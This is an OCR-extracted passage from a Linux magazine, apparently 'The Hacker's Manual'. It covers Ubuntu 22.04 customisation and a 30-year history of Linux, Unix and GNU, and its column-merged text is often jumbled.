sandbox to make it work. Since this is a security risk we can also be enabled from the Appearance section. monitors.
won’t tell you how to do it here (but we're sure you can
DuckDuckGo it).
In that feature we also saw that both Snap and
Flatpak versions of Firefox (and Chromium and Edge)
can't handle extensions which use Native Messaging.
This is still true, so password manager extensions (as
well as things like hardware authentication tokens) don't
currently work here. Both packaging formats should
soon see a host messaging portal soon, but until then
these add-ons will only work with traditionally packaged
browsers. On a related tangent. KeePassXC installed as a
Snap (or Flatpak) will integrate with such browsers, but
you'll need to run a script, as described on its website.
Another consequence of contained browsers is that
the old https://extensions.gnome.org (EGO) website
won't work correctly. Even if you install chrome-gnome­

The Hacker’s Manual | 15


Distros

Tweaking and rewiring


Some final edits to perfect your installation, plus a little Ubuntu nostalgia.
ayland by default was tested in Ubuntu 17.10, but $ sudo apt install pipewire-pulse . Then if you log out and

U that was perhaps a little ambitious. Now the


technology has matured and Canonical is

"ready for prime time". Extensive testing has taken place


back in and run the command:
$ pactl info
confident that it's - to dredge up an irksome phrase -you should see (among other lines):
Server Name: PulseAudio (on PipeWire 0.3.xx)
and the team are confident that the Wayland experience Additional libraries may be required for some
will be good for all. Yep, even those using Nvidia hardware. Bluetooth audio codecs. Try:
If it's not, well, that's fine. The old Xll session is still there. $ sudo apt install libfdk-aac2 libldacbt-{abr,enc}2
Wayland has been fairly misrepresented in the libopenaptxO
press, (who, me?-Ed) historically. The most egregious if you run into difficulties. Alternatively, seek more up-to-
falsehoods were that remote desktop sessions, screen date documentation, we are unfortunately static!
sharing and even humble screenshotting are impossible Ubuntu has used Gnome as its default desktop
with Wayland. Do not believe such myths. The problem since 18.04 LTS. If you pine for the Unity desktop,
wasn't Wayland, it was programs that didn't support it. All then you might be interested in the Extended Security
the screenshots in this feature would not be here if that Maintenance (ESM) that’s available for the previous LTS,
were the case. Ubuntu 16.04 (Xenial Xerus). The official support period
for this expired in May 2021, but since this version is still
We’re in Gnome’s golden age widely deployed Canonical offers paid-for support to
organisations. This is achieved through its Ubuntu
“The stutters and memory leaks Advantage for Infrastructure program. Personal users are

that dogged Ubuntu Gnome’s allowed ESM on up to three machines for free, so if you
want to keep the Xerus alive you can now do so in a safe
performance for so long are well and (semi) supported manner.
We were feeling nostalgic, so we fired up Ubuntu 16.04
and truly gone.” on our XPS. This hadn’t been booted for some time, and
had problems seeing our new-fangled USB-C dock (or the
One change mulled for 22.04 but which in the end network cable plugged therein). But once we’d updated it,
never made it is the replacement of PulseAudio with enrolled the machine in Ubuntu Advantage and updated
PipeWire. The latter is a whole new multimedia framework again everything worked more or less fine. Don’t let
which, as it happens, enables desktop sharing and screen anyone tell you nostalgia is not a good reason for running
recording on Wayland. Programs may still depend on old software. Especially when you're entitled to run three
PipeWire (particularly web browsers), but venerable instances for your own pleasure. If you were looking for
PulseAudio remains the default sound server. If you want actual phone and ticket support, then this starts at $150/
to change this (for example, if you are having difficulty year for a single desktop installation or $750/year for a
with Bluetooth headsets), you can install the PipeWire server. It's not really intended to help beginners get their
session with printers or Wi-Fi working. Ask nicely on https://
ubuntuforums.org or https://askubuntu.com for
that sort of support.
Booting back into the new release was much
quicker and smoother by comparison, which to be
honest you'd expect after six years of Ul
development. This release might not have the
kind ground-breaking features that we used to
enjoy, but that’s probably a good thing. All those
features and breaking changes we used to
love five to 15-years ago were a
consequence of desktop Linux still
being rather new. Now that
Ubuntu’s desktop is established,
like it or not, it doesn’t make
sense to go changing it.
Instead, we should take
comfort in the fact that after
four years of using Gnome for
> One thing that was quite hard to screenshot (but for once not its flagship desktop, the
because of Wayland) was the new screenshot tool. Oh the irony! experience is now second to

16 I The Hacker’s Manual


Bullet-proof Ubuntu 22.04
none. The stutters and memory
leaks that dogged Ubuntu Gnome's
performance for so long are well and
truly gone.

A common Theme
Gnome themes have come under the
spotlight since the introduction of
GTK4 (inaugurated with Gnome 40).
Did we say themes? Ah, we meant
theme, because custom theming of
Gnome applications is now verboten.
The cefault GTK3 theme was called
Adwaita, a Sanskrit word often
translated as ‘the only one’, (literally
‘not two'). But it wasn’t really the
only one, because developers could
happily write their own CSS stylings.
In GTK4 this theme has been
promoted to a platform library,

Il
libadwaita. which Gnome

/
developers say will guarantee
conformance with their Human
Interface Guidelines. And (like the characters often say in everything else, including cleaning up the mess our > Menus in
titlebars. Amazon
Highlander) there can be only one. GTK3 applications will Gnome fonts ended up in post installation of KDE
search results in
still respect custom themes, but GTK4 ones will only Plasma. Tweaks also enables you to manage startup
the HUD. Ubuntu
support the limited changes (for example, background programs, change titlebar button visibility (or move them
16.04 had some
and accent colours) permitted by libadwaita. to the left, MacOS style) and adjust legacy theming. You crazy ideas!
For Ubuntu 22.04 this might be bad news, because at can install Tweaks with:
present it uses a mix of Gnome 42 applications $ sudo apt install gnome-tweaks
(libadwaita-based) plus some from older releases (such This will install a different Extensions tool, currently in
as Files, which is based on GTK3 and libhandy). This beta form. At the time of writing this doesn't let you
may change prior to release, otherwise there are going to install new extensions, otherwise we could do away with
be some cosmetic inconsistencies. If this bothers you, the previous tool. For even more tweakability, try Just
then you might want to run away from Gnome 42 for the Perfection, found in Extension Manager. It allows for parts
next little while, in which case there are some suggestions of the shell theme to be overruled (including removal of
in the box (see below). the top bar) to make matters more minimal. We don’t go
The old Gnome Tweaks tool is still available in the for Gnome extensions ourselves (despite having two
repo, but like the EGO website it can no longer manage programs for managing them), let us know what we’re
Gnome extensions. That's okay, because it can do most missing out on. Enjoy Ubuntu 22.04!

Looking elsewhere?
Latterly there seems to have been a bit of a trend for Linux-leaning We're excited to see more people trying Fedora. It's now more
social media channels to announce they’re "no longe' recommending accessible, particularly as regards installing non-free software.
Ubuntu” or other such things. Reasons are varied, we suppose, but the Together with its rapid release cycle this makes it a great platform for
triumvirate of Snaps, Wayland and Gnome don’t seem to be to gaming. Well worth checking out if Ubuntu is no longer serving you.
everyone’s taste.
We'd still heartily recommend Ubuntu to anyone, beginner or
otherwise - as it “just works". Even if you don't like it. as we've seen it
can be customised, extended or otherwise bashed around to your
taste. Lots of the distros these channels recommend in Ubuntu’s stead
are themselves based on Ubuntu - for example Linux Mint. Pop!_OS
and Elementary OS. All great distros that offer something which is hard
to recreate on Ubuntu Linux, but ultimately distros that depend on its
packages, infrastructure and documentation.
Until now. perhaps.
Mint’s latest Debian Edition (LMDE5) is rapidly gaining traction.
Pop!_OS has moved its PPA repositories away from LaunchPad and is
working on a new Rust-powered desktop environment (with a view to
moving away from Gnome). And Elementary OS has had its own app
store for a while and has likewise sided with Flatpaks over Snaps. In
summary, if Ubuntu doesn’t do it for you. there are plenty of
derivatives you can switch to without having to learn a whole new way
of working. > Fedoras and the distribution of that name are all the rage right now.

The Hacker's Manual | 17


Celebrate

of Linux!
How a 21-year-old’s bedroom coding project took over
the world and a few other things along the way.
30 years of Linux

inux only exists because of Christmas.

L On January 5,1991, a 21-year-old computer science


student, who was currently living with his mum,
trudged through the (we assume) snow-covered streets of
Helsinki, with his pockets stuffed full of Christmas gift
money. Linus Torvalds wandered up to his local PC store and
purchased his first PC, an Intel 386 DX33. with 4MB of
memory and a 40MB hard drive. On this stalwart machine he
would write the first-ever version of Linux. From this moment
on, the history of Linux becomes a love story about
community collaboration, open-source development,
software freedom and open platforms.
Previous to walking into that computer store, Linus
Torvalds had tinkered on the obscure (UK-designed)
Sinclair QL (Quantum Leap) and the far better-known
Commodore VIC-20. Fine home computers, but neither
was going to birth a world-straddling kernel. A boy
needs standards to make something that will be
adopted worldwide, and an IBM-compatible PC was a
perfect place to start. But we’re sure Torvalds’ mind
was focused more on having fun with Prince of Persia
at that point than specifically developing a Microsoft-
conquering kernel.
Let's be clear: a 21-year-old, barely able to afford an
Intel 386 DX33, was about to start a development
process that would support a software ecosystem,
which in turn would run most of the smart devices in the
world, a majority of the internet, all of the world’s fastest
supercomputers, chunks of Hollywood's special effects
industry, SpaceX rockets, NASA Mars probes, self­
driving cars, tens of millions of SBC like the Pi and a
whole bunch of other stuff. How the heck did that
happen? Turn the page to find out...

“A 21-year-old, barely
able to afford an Intel 386
DX33, was about to start
a development process
that would support a
software ecosystem...”

The Hacker's Manual | 19


Distros

Pre-Linux development
Discover how Unix and GNU became the foundation of Linus Torvalds’ brainchild.

o understand how Linux got started, you need to open approach. This enabled free experimentation,

T understand Unix. Before Linux. Unix was a well-


established operating system standard through the
1960s into the 1970s. It was already powering mainframes
built by the likes of IBM, HP, and AT&T. We're not talking small
development and collaboration on a worldwide scale.
Yeah, yeah, you get the point!
Back to Unix, which is an operating system standard
that started development in academia at the end of the
fry, then - they were mega corporations selling their products 1960s as part of MIT, Bell Labs and then part of AT&T.
around the globe. The initially single or uni-processing OS, spawned from
If we look at the development of Unix, you'll see the Multics OS, was dubbed Unics, with an assembler,
certain parallels with Linux: freethinking academic types editor and the B programming language. At some point
who were given free rein to develop what they want. But that "cs" was swapped to an "x,” probably because it was
whereas Unix was ultimately boxed into closed-source cooler, dude.
corporatism, tied to a fixed and dwindling development At some point, someone needed a text editor to run
team, eroded by profit margins and lawyers’ fees, on a DEC PDP-11 machine. So, the Unix team obliged and
groups that followed Linux embraced a more strict developed roff and troff, the first digital typesetting
system. Such unfettered functionality demanded
documentation, so the "man” system (still used to this
day) was created with the first Unix Programming
Manual in November 1971. This was all a stroke of luck,
because the DEC PDP-11 was the most popular mini­
mainframe of its day, and everyone focused on the
neatly documented and openly shared Unix system.
In 1973, version 4 of Unix was rewritten in portable C,
though it would be five years until anyone tried running
Unix on anything but a PDP-11. At this point, a copy of
the Unix source code cost almost $100,000 in current
money to licence from AT&T, so commercial use was
limited during the 70s. However, by the early 80s costs
had rapidly dropped and widespread use at Bell Labs,
AT&T, and among computer science students propelled
the use of Unix. It was considered a universal OS
standard, and in the mid-1980s the POSIX standard was
proposed by the IEEE, backed by the US government.
> Ken Thomas (left) and Dennis Ritchie are credited with largely creating much
This makes any operating system following POSIX at
of the original UNIX family of operating systems, while Ritchie also created the
C language. least partly if not largely compatible with other versions.

Linux runs everything


Develooing software for supercomputers is all Linux-based. Microsoft's cloud for real-time OSes in mission-critical
expensive. During the 1980s, Cray service Azure reports that Linux is its largest situations. Turns out that SpaceX rockets use
was spending as much on software deployment OS and. more to Linux to power their flight systems, using a
development as it was on its hardware. In a the point, Google uses Linux to power most of triple-redundancy system, while NASA has
trend that would only grow, Cray initially its services, as do many other service sent Linux to Mars in its helicopter drone.
shifted to UNIX System V, then suppliers aka AWS. Ingenuity. Tesla is also reportedly running
a BSD-based OS. and eventually, in 2004. Android's mobile OS share dropped in 2020 Linux in its cars.
SUSE Linux to power its supercomputers. This to just 84 per cent - it's powered by Linux. Linux has also been at the heart of
was matched across the sector, and the top Google bought the startup that was Hollywood's special effects since 1997's
500 supercomputers (www.top500.org) developing Android in 2005. LineageOS Titanic used a Linux server farm of DEC
now all run Linux. (https://lineageos.org) is a well- Alphas at Digital Domain to create its CGI.
Internet services have also all been maintained fork of Android and supports most DreamWorks' Shrek in 2001 was the first film
developed to run on Unix systems. Microsoft popular handsets well after their that was entirely created on Linux systems.
and BSD systems do retain a good slice of manufacturers abandon them. Meanwhile. Pixar ported its Renderman
services, but over 50 per cent of web servers Space was thought to be Linux's final system to Linux from SGI and Sun servers
are powered by Linux, Recent moves to virtual frontier, because it’s not a certified around 2000, in time to produce Finding
services with container-based deployment are deterministic OS, which is the gold standard Nemo in 2003.

20 | The Hacker's Manual


30 years of Linux

> Linus Tovalds


being interviewed
by Linux Format
back in 2012.

At the end of the 1980s, the Unix story got messy, The GNU Project was established by Stallman in
with commercial infighting, competing standards and 1983, with GNU being a hilarious (to hackers, at least)
closing off of standards, often dubbed Unix Wars. While recursive acronym for “GNU is Not Unix." Geddit? Its
AT&T, Sun Microsystems, Oracle, SCO, and others aim was to establish a free OS ecosystem with all the
argued, a Finnish boy was about to start university... tools and services a fully functioning OS requires. Do
keep in mind that most of the tools created then
We GNU that are still being used and maintained today.
Before we dive into the early world of Linux, there's By 1987, GNU had established its own compiler, GCC,
another part of the puzzle of its success that we need to the Emacs editor, the basis of the GNU Core Utilities
put in place: the GNU Project, established by Richard (basic file manipulation tools such as list, copy, delete
Stallman. Stallman was a product of the 1970s and so on), a rudimentary kernel and a chess engine
development environment: a freethinking, academic, (See LXF273). But more importantly, Stallman had
hippy type. One day, he couldn’t use a printer, and cemented his ideal of software freedom with the 1989
because the company refused to supply the source
code, he couldn’t fix the issue - supplying source code
was quite normal at the time. He went apoplectic and
“He established a free software
established a free software development revolution: an
entire free OS ecosystem, free software licence and
development revolution: an
philosophy that's still going strong. Take that, entire free OS ecosystem, free
proprietary software!
software licence and philosophy
that’s still going strong.”
“copyleft" GPL software licence, and his manifesto
setting out the four software freedoms enabling users
to run, study, modify and distribute any software -
including the source - for any reason.
The GPL remains the strongest copyleft licence, and
while it has perhaps fallen out of vogue, it's still regarded
as the best licence for true open-source development,
and cements most Linux distros. GCC is still an industry
standard, Emacs remains a feature-rich development
environment, and the GNU Core Utilities are still widely
used in certain POSIX systems and most Linux distros.
You could argue that without the GNU Project being
established, Linux would never have taken off. The GPL
licence (adopted early on in Linux development) forces
all developers to share back their enhancements to the
source code. It’s a feedback loop that promotes shared
improvements. Alternative open-source licences enable
corporations to take source code and never share back
improvements, meaning the base code is more likely to
> Linux Format interviewed Richard Stallman, the creator of
remain static. This was backed by a generation of
the GNU free software movement, in 2011.

The Hacker's Manual | 21


Distros
developers that grew up studying and using Unix,
looking to contribute to a truly freed open-source OS.

Let’s all Freax out!


We're getting ahead of ourselves. Linus Torvalds had
his Intel 386, was studying computer science at the
University of Helsinki, and was using the MINIX 16-bit
> We have to OS and kernel. MINIX is a POSIX-compatible Unix-like
mention Tux,
OS and micro-kernel. In 1991, it had a liberal licence,
the mascot of
costing just $69, offering the source code but restricted
Linux, because a
modification and redistribution.
penguin once bit
Linus. True story! We imagine the 16-bit limitation spurred Torvalds to
create his own 32-bit kernel, but he
states the licence restrictions
were also key. So, on 25 August,
1991, he posted to comp.os.
minix that he was developing
his own free OS. He said that it > Minix for all of its creator’s protestations to its
was "nothing professional like superiority has ceased development, even though it runs
GNU," and it’d only support AT Intel’s CPU Management Engine.

disks, as that's all he had.


This was developed on a
MINIX system, compiled on of Linux was released to the world in September 1991.
GNU GCC, and he’d ported One telling part of
GNU bash. Torvalds had the release notes states: “A kernel by itself gets you
planned to call his OS nowhere. To get a working system you need a shell,
Freax, combining compilers, a library, etc... Most of the tools used with
“Free,” "Freak,"and Linux are GNU software and are under the GNU
"Unix," but once copyleft. These tools aren’t in the distribution - ask me
he’d uploaded it (or GNU) for more info."
to ftp.funet.fi, Importantly, this outlines Linux's reliance on other
a volunteer GPL-licenced tools, and shows the use of the term
admin (Ari “distribution,’’ now shortened to “distro.” As Torvalds
Lemmke) points out, an operating system isn't a kernel alone; it's
renamed it a collection of tools, scripts, configs, drivers, services
Linux, as he and a kernel, lumped together in an easier form for
thought it users to install and use.
was better. As for the licence, Torvalds initially used his own,
So, version which restricted commercial use. but by January 1992
0.01 he'd been asked to adopt the GPL, and had stated the
kernel licence would change to align it with the other
tools being used. It was December 1992, and for the
release of v0.99. the Linux kernel was GPLv2-licenced.
This cemented the legal clause that anyone using the
kernel source has to contribute back any changes used
in published code.

Birth of The Linux Foundation


Open Source Development Labs was set up at him to continue kernel development alongside biggest contributor. Besides funding the
the turn of the millennium to, among other his other work. Five years previous, another Kernel, tne LF host hundreds of other open
things, get Linux into data centres and consortium, the Free Standards Group had source projects, including Let's Encrypt, the
communication networks. They became been set up. By 2007 its work was mostly OpenJS Foundation and the Core
Torvald's (and his right-hand man Andrew driving people to switch to Linux, and the two Infrastructure Initiative, which aims to secure
Morton's) employer in 2003. Prior to this he groups merged to form the Linux Foundation the software which underpins the internet.
was employed by Transmeta, who permitted (LF). Today the LF's Platinum members But it's not all code and corporations.
include Facebook, Microsoft, Tencent. IBM and There’s conferences too, and it's thanks to the
mm the Intel. All of whom, contribute (besides the half Linux Foundation that we've been able to

J LINUX
a million dollars required for Platinum status) provide interviews and coverage from the
a great deal of code to the Kernel. In 2012, annual Open Source Summit. We look forward
when Microsoft wanted to get Linux working to conference season resuming, so we can get
— FOUNDATION on its Azure cloud, they were for a time the back to the snack bars and coffee counters.

22 | The Hacker's Manual


30 years of Linux

Early kernel development


Refining the very heart of Linux hasn’t been an easy ride over the years...
re you a recent Linux convert who's had to preferred the DOS way of working, which began to be

A engage in combat with rogue configuration files,


misbehaving drivers or other baffling failures?
Then spare a thought for those early adopters whose
bug reports and invective utterances blazed the trail for
sidelined as the millennium approached. Windows users
were having their files abstracted away - ‘My Computer’
epitomises this movement.
In January 2001 Kernel 2.4 was released and with it
contemporary desktop Linux. Up until comparatively came support for USB and the exciting new Pentium IV
recently, it was entirely possible to destroy your monitor processors, among other things. It was of particular
by feeding X invalid timing information. Ever had importance to desktop users thanks to its unified
problems with Grub? Try fighting it out with an early treatment of PCI, ISA, PC Card and PnP devices as well
version of Lilo. as ACPI support. The dot-com bubble was just about to
In the early days, even getting a mouse to work was burst, but all the excitement and speculation around it
non-trivial, requiring the user to do all kinds of manual meant that many computer enthusiasts had a
calibration. Red Hat released a tool called Xconfigurator broadband connection in their home, some even
that provided a text-mode, menu-driven interface for enjoyed the luxury of owning more than one computer.
setting up the X server. It was considered a godsend,
even though all it did was generate an XF86Config file User-unfriendly Linux
which otherwise you’d have to write yourself. This solved some major entry barriers to Linux: people could
So while in 2000 users whined about Windows Me now download it much more easily; up-to-date
being slow and disabling real-mode DOS, your average documentation was easily accessible; and when Linux saw fit
Linux user would jump for joy if their installation process to disappear one's internet connection (or render the system
completed. Even if you got to that stage, it would be unbootable), the other machine could be used to seek
foolishly optimistic to suppose the OS would boot guidance. But the user experience was still, on the whole,
successfully. Hardware detection was virtually non­ woefully inhospitable. While some installers had evolved
existent, and of the few drivers that had been written for graphical capabilities, these more often than not were more
Linux, most weren't production quality. Yet somehow, trouble than they were worth. Users were expected to
the pioneers persisted - many were of the mindset that understand the ins and outs of

>The Human
theme was an
attempt to
make Ubuntu
Linux more
friendly, because
as everyone
knows brown
is beautiful,
especially if
you're a warthog.

The Hacker's Manual | 23


Distros

disk partitioning, and be able to discern which packages they against its achieving all of these adjectives. One of the major
required from often terse descriptions. enablers was its strict adherence to the Gnome Human
Windows XP was released in October 2001, and Interface Guidelines, which set out some key principles for
while this was seen as a vast improvement over its application designers.This meant the desktop was consistent
predecessor, many users found that their machines not just internally, but in respect to all the GTK apps that
weren't up to running it. After all, it required 64MB RAM people would go on to write for it.
and a whopping 1.5GB of disk space. Remember that Also released was KDE 3, which vaguely resembled
BIOSes had only recently gained the ability to address Windows - in that it was cosmetically similar and
large drives (there were various limits, depending on the slightly more resource-demanding than Gnome. People
BIOS, 2.1,4.2 and 8.4GB were common barriers), So and distributions sided with one or the other. SUSE
many people couldn't install it on their hardware, and Linux (predecessor of openSUSE) always aimed to be
many that met the minimum specs found the desktop agnostic, but went KDE-only in 2009. Today it
performance rapidly degraded once the usual pantheon caters to both Gnome and KDE.
of office suites and runtime libraries were installed. In late 2002, ‘DVD’ Jon Johansen was charged
This provided the motivation for another minor over the 1999 release of the DeCSS software for
exodus to Linux, and the retro-hardware contingent circumventing the Content Scrambling System (CSS)
continue to make up a key part of the Linux userbase used on commercial DVDs. This software enabled Linux
(and berate us for not including 32-bit distros). Before users to play DVDs, a feat they had been hitherto unable
2006 all Macs had PowerPC processors, and many of to do since DVD software required a licence key from
these (as well as early Intel Macs), long-bereft of the DVD Copy Control Agency, one of the plaintiffs in
software updates from Apple, now run Linux too. the suit. It later emerged that CSS could be broken
much more trivially and Johansen was eventually
Gnome makes an appearance acquitted. By this time iPods and piracy meant that
The Gnome 2 desktop environment was released in 2002 and MP3 files were commonplace. These were dogged by
this would become a desktop so influential that some still patent issues with a number of bodies asserting
seek (whether out of nostalgia, atavism or curmudgeonly ownership of various parts of the underlying algorithm.
dislike of modern alternatives) to reproduce it. It aimed to be As a result, many distros shipped without patent-
as simple, tweakable and intuitive, and it's hard to argue encumbered multimedia codecs. The law is murky

Big Business vs Linux


Being the root of all evil, whenever money is infamously called Linux a cancer in 2001. The infringement of the source code. In 2003, a
involved, things can turn nasty. So. when the documents are available at www.catb. company called SCO claimed part of its UNIX
big players in the enterprise and business org/~esr/halloween, and in them Microsoft System V source code was being used within
markets began to see Linux distros as a predicted that "Linux is on track to eventually Linux, making it an unauthorised derivative of
threat, lawyers were called. own the x86 UNIX market..." UNIX. SCO sued IBM for
A series of leaked Microsoft memos from It was correct. There was little Microsoft could $1 billion (among many other companies), and
August 1998, known as the Halloween do to combat Linux, as it couldn't be bought. demanded end users pay a Linux licence fee.
Documents for the date they were released, The documents suggested extending open Microsoft leaped into action and paid SCO
detailed Microsoft's private worries that Linux, protocols with Microsoft's own proprietary $106 million, as detailed in a leaked and
and open-source development in general, was extensions (that didn't work), and seeding the verified SCO memo. After years of legal
a direct threat to its business, along with ways market with fear, uncertainty and doubt (FUD) arguments, a code audit found there to be no
to combat its uptake. This private view was in also failed. evidence of copied UNIX code in the Linux
direct conflict with the company’s public line There was another angle, however: help a kernel. SCO went bankrupt in 2009, but parts
on the matter, though Steve Ballmer company that's suing over copyright of the lawsuit still rumble on.

25 AUGUST 1991 17 SEPTEMBER 1991 NOVEMBER 1991 5 JANUARY 1992


f

Linus announces on
1
vO.Ol Posted on ftp.funet.fi vO.lO Linux is self-building v0.12 GPL licenced
comp.os.minix This release includes Bash vl.08 Linus overwrites critical parts of Linux originally had its
Linus Torvalds, a 21-year-old and GCC vl.40. At this time, the his Minix partition. Since he own licence to restrict
student at the University of source-only OS couldn't boot into Minix, he commercial activity.
Helsinki, Finland, starts toying is free of any Minix code decided to write the programs Linus switches
with the idea of creating his own and has a multi-threaded to compile Linux under itself. to GPL with
clone of file system. this release.
e the Minix OS.

1991 May 1992


Python Softlanding Linux System

24 | The Hacker's Manual


30 years of Linux

> The LiMux project


though, and rights holders have shown restraint in filing
branded Tux with
suit against FOSS implementations of these codecs.
Munich's emblem,
Most distros are prudent and leave it up to the user to
the Miinchner Kindi.
install these, although Ubuntu and derivatives will do so
Apparently it didn’t a
if you tick a box. The MP3 patent expired in 2017, though hurt a bit. The project is
it doesn't really matter - we have plenty of open formats estimated to have saved
and codecs now (OGG. FLAC, VPx and x264). It's still around €11 million.
technically a DMCA violation to use libdvdcss (a modern
and much more efficient way of cracking CSS, used by
the majority of media players on Linux) to watch a DVD,
but that only applies in some countries and to date, no
one has challenged its use.

Early kernel development


As Linux gained traction, first among academics and
hobbyists and then, by the mid-90s, when businesses
started to form around it. the number of contributors
“The venerable Advanced Linux
bloomed. One take from Linus himself, is that once the
X Windows System was working on Linux (with v0.95) it
Sound Architecture (ALSA)
became much more appealing. So one could infer that subsystem enabled (almost) out-
even in 1992 people were afraid of the command line.
This popularity led to the establishment of the of-the-box functionality for
maintainer heirarchy so that patches submitted could
be reviewed and promoted efficiently to Linus’ source
popular sound cards.”
tree. Though that first version of the MAINTAINERS file
describes Linus as "buried alive in email”. the venerable Advanced Linux Sound Architecture
The email-centric development process is still (ALSA) subsystem. This enabled (a most) out-of-the-
follov/ed today, except that the Official Linux Kernel box functionality for popular sound cards, as well as
Mailing List was set up in 1997, and now Git is used for support for multiple devices, hardware mixing, full-
version control. So it's a lot easier to make sure you’re duplex operation and MIDI. The most far-reaching new
working on an up-to-date branch, rather than having to feature was the old device management subsystem,
wait for floppies in the mail. Patches are still generated devfs, being superceded by udev. This didn’t appear
using diff -u to show which lines have been changed in until 2.6.13 (November 2003), at which point the /dev
which files. Before Git, the proprietary BitKeeper directory ceased to be a list of (many, many) static
concurrent versioning system (CVS) was used. And nodes and became a dynamic reflection of the devices
when this arrangement came to an end (helped by actually connected to the system. The subsystem udev
Andrew Tridge’s reverse engineering mischief), Torvalds also handled firmware loading, and userspace events
got hacking and 10 days later there was Git. and contributed to a much more convenient experience
After two years in development Kernel 2.6 was for desktop users. Although you still relied on such
released in 2003. This was a vastly different beast to arcana as HAL and ivman in order to automount a USB
2.4, featuring scheduler enhancements, improved stick with the correct permissions. Linux (having
support for multiprocessor systems (including already been ported to non-x86 64 bit processors)
hyperthreading, NPTL and NUMA support), faster I/O supported the Itanium’s IA64 instruction when it was
and a huge amount of extra hardware support. We also released in 2001. This architecture was doomed to fail
saw the Physical Address Extension (PAE) so that 32-bit though, and Intel eventually moved to the more
machines could address up to 64GB of RAM (before conservative AMD64 (or x86-64) architecture, which
they were limited to about 3.2GB). Also introduced was has been around since 2003.

7 MARCH 1992 14 MARCH 1994 7 MARCH 1995 9 JUNE 1996 20 FEBRUARY 2002

T
vO.95 X Windows
A hacker named Orest
vl.0.0 C++ compiled
The first production release.
vl.2.0 Linux ‘95
Portability is one of the first
v2.0.0 SMP support
Symmetric multiprocessing
V2.5.5 64-bit CPUs
AMD 64-bit (x86-64)and
»
Zborowski ports Linus had been overly issues to be addressed. (SMP) is added, which PowerPC 64-bit
X Windows optimistic in naming v0.95 This version gains support made it a serious are now supported.
to Linux. , u and it for computers using contender for many

w took about two years


to get version 1.0 out
the door.
processors based on the
Alpha. SPARC and
MIPS architectures.
companies.

March 1992 April 1996 Sept 2002


386BSD Apache HTTP Blender

The Hacker's Manual | 25


Distros
Thanks to open source development, Linux users were Ubuntu followed suit in 8.04, although its
running 64-bit desktops right away, while Windows implementation attracted much criticism and resulted in
users would have to wait until 20C5 for the x64 release much anti-Pulse vitriol. Poettering at one stage even
of XP. Various proprietary applications (notably Steam described his brainchild as “the software that currently
and lots its games) run in 32-bit mode, which provides breaks your audio." It took some time but eventually
some motivation for distributions to maintain at least Ubuntu (and other distros) sorted out implementation
some 32-bit libraries. issues, and it mostly worked out of the box. Now we
Debian 11 will support 32-bit x86 in some form until have Pipewire in the works for a new generation of
2026, but most other distros have abandoned it. audio-based rage against the machine.
Eventually such machines will go the way of the 386, no
longer supported on Linux since 2013. The cost of progress
The year 2010 may be remembered by some as the
Enter the archetype one Ubuntu started to lose the plot. Its Ubuntu Software
In 2004, a sound server called Polypaudio was released Center now included paid-for apps and the Netbook
by a hitherto unknown developer called Lennart remix used a new desktop called Unity. In the 11.04
Poettering and some others. At this time desktop release though, this became the new shell for the main
environments relied on sound servers to overcome release too. Ubuntu had long taken issue with the new
shortcomings in ALSA’s dmix system: Gnome was using Gnome 3 desktop, which at the time of the Ubuntu
the Enlightened Sound Daemon (ESD) and KDE was feature-freeze was not considered stable enough to
using the analogue Realtime synthesizer (aRts). include in the release anyway, and Gnome 2 was already
Polypaudio was designed to be a drop-in replacement a relic. So in a sense Ubuntu had no choice, but no one
for ESD. providing much more advanced features, likes change, and users were quick to bemoan the new
such as per-application volume control and network desktops. Of course things have come full circle with
transparency. In 2006 the project, citing criticism that Ubuntu using Gnome 3 once more since 20.04 and
nobody wants polyps, renamed itself PulseAudio (it was people bemoaning the loss of Unity.
in fact named after the sea-dwellirg creature). Gnome 3 is not without controversy too. First, many
> Asus' EeePC With its new name and increased demand for a preferred the old Gnome 2 way of doing things and this
Linux was based sound system comparable with that of OSX or the clearly was not that. Second, all the fancy desktop
on Xandros newly released (and much maligned) Windows Vista, effects required a reasonable graphics card (and also
and IceWM, PulseAudio enjoyed substantial development and began working drivers). There was a fallback mode, but it
but beginners
to be considered for inclusion in many distros. As is severely crippled desktop usability. Finally, this
didn't like it, and
traditional, Fedora was the first to adopt, incorporating appeared to be something designed for use on mobiles
professionals
it as the default in version 8, released in late 2007. or tablets, yet even today mobile Linux (not counting
just replaced it.
Android) has never taken off, so why should users be
forced into this mode of thinking? Many found though,
that once some old habits are unlearned and some
sneaky keyboard shortcuts are learned (and Gnome’s
Tweak Tool is installed), that the Gnome 3 way of
working could be just as efficient, if not more so, than its
predecessor. KDE users looked on smugly, having
already gone through all the rigmarole of desktop
modernisation (albeit less drastic than Gnome’s) when
KDE 4 was released in 2008.
Around this point we ought to mention Systemd as
Wireless
Networks well, but there’s not much to say that hasn’t been said
elsewhere: the old init system was creaking at the
seams: a new and better one came along; it wasn’t
everyone’s cup of tea, but we use it anyway; the internet

n «» 10:«jO 0 O ► slanders Lennart Poettering.

17 DECEMBER 2003 29 NOVEMBER 2006 5 FEBRUARY 2007 25 DECEMBER 2008

f
v2.6.0 The Beaver Detox v2.6.19 ext4
r ?
V2.6.20 KVM arrives
t
v2.6.28 Graphics rewrite
Major overhaul to Loadable Experimental support for the Kernel-based Virtual Machine The Linux graphics stack was
Kernel Modules (LKM). ext4 filesystem. (KVM) is merged, adding Intel fully updated to ensure that it
Improved performance for and AMD hardware visualisation utilised the full power of modern
enterprise-class hardware, the extensions. GPUs.

(D Virtual Memory subsystem, the


CPU scheduler and the I/O

E scheduler.

April 2003 August 2006


O
September 2008
Firefox Linux Mint Chromium

26 | The Hacker's Manual


30 years of Linux

Distro developments
A single kernel has enabled a good number of
Linux distributions to blossom into life.
fter looking into the development of the Linux

A kernel itself and the surrounding supporting


software, let's turn to how Linux distributions
(distros) from this point were developed and branchec into a
wide-ranging ecosystem.
Distros enabled the use of the Linux kernel to grow
rapidly. Not only did they ease the installation of Linux
(which early on was a complex process of source
compilation, gathering the right tools, creating
filesystem layouts by hand, and bootloaders, all from
the terminal on systems with limited resources), but
one distro can also become the base for a whole new
distro, tailored for a new use or audience.

Primordial soup
As L nux vO.Ol was only released in September 1991, > The first
the first distribution of Linux - though by modern maintained by individuals, groups, or businesses. Linux distro,
standards, it’s lacking in every department - created by Once they’re established, stable and become popular, aptly named:
HJ Lu, was simply called Linux 0.12. Released at the end offshoots branch from these root distros offering new Linux 0.12.
of 1991, it came on two 5.25-inch floppy disks, and specialisations or features. This creates a number of
required a HEX editor to get running. One disk was a base distro genera, formed around the original package
kernel boot disk, the other stored the root OS tools. manager and software repositories.
